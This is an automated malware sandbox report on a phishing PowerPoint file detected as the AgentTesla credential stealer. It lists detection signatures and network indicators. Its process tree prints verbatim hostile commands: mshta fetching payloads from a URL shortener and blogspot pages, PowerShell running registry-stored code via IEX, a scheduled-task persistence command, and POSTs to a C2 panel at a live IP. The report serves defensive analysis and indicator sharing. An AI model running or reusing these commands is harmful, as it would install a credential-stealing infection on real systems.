
Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Sample Name: BankSwiftCopyUSD95000.ppt
Analysis ID: 339086
MD5: 7f0b415d0b7a76530b2f510a910811e5
SHA1: 480594ad26c91dd9d719c80334285375540dc83e
SHA256: 8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Tags: ppt

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
.NET source code contains very large array initializations
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Startup

  • System is w7x64
  • POWERPNT.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2476 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • PING.EXE (PID: 2776 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
      • mshta.exe (PID: 2756 cmdline: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2816 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
          • MSBuild.exe (PID: 2720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
        • schtasks.exe (PID: 3036 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\') MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
        • cmd.exe (PID: 2340 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • taskkill.exe (PID: 956 cmdline: taskkill /f /im winword.exe MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 1620 cmdline: taskkill /f /im EXCEL.exe MD5: 3722FA501DCB50AE42818F9034906891)
      • PING.EXE (PID: 2720 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
  • taskeng.exe (PID: 2168 cmdline: taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • mshta.exe (PID: 2368 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
      • mshta.exe (PID: 600 cmdline: 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 288 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 848 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • powershell.exe (PID: 2796 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 2468 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2236 cmdline: 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1776 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 592 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2224 cmdline: 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • mshta.exe (PID: 532 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2112 cmdline: 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
29.2.MSBuild.exe.400000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Powershell execute code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
Sigma detected: Schedule script from internet via mshta
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), ProcessId: 3036
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2476, ProcessCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ProcessId: 2756

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: BankSwiftCopyUSD95000.ppt; Avira: detected
Multi AV Scanner detection for submitted file
Source: BankSwiftCopyUSD95000.ppt; Virustotal: Detection: 34%
Source: BankSwiftCopyUSD95000.ppt; ReversingLabs: Detection: 21%
Machine Learning detection for sample
Source: BankSwiftCopyUSD95000.ppt; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE; Process created: C:\Windows\System32\PING.EXE
Source: powerpnt.exe; Memory has grown: Private usage: 0MB later: 10MB
Source: global traffic; DNS query: name: j.mp
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

              Networking:

              barindex
              Connects to a URL shortener serviceShow sources
              Source: unknownDNS query: name: j.mp
              Connects to a pastebin service (likely for C&C)Show sources
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Source: unknownDNS query: name: paste.ee
              Uses ping.exe to check the status of other devices and networksShow sources
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
              Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
              Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
              Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: global trafficHTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
              Source: global trafficHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
              Source: global trafficHTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: j.mp
Source: unknown | HTTP traffic detected:
    POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 64.188.18.218
    Content-Length: 368
    Expect: 100-continue
    Connection: Keep-Alive
Source: mshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmp | String found in binary or memory: Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
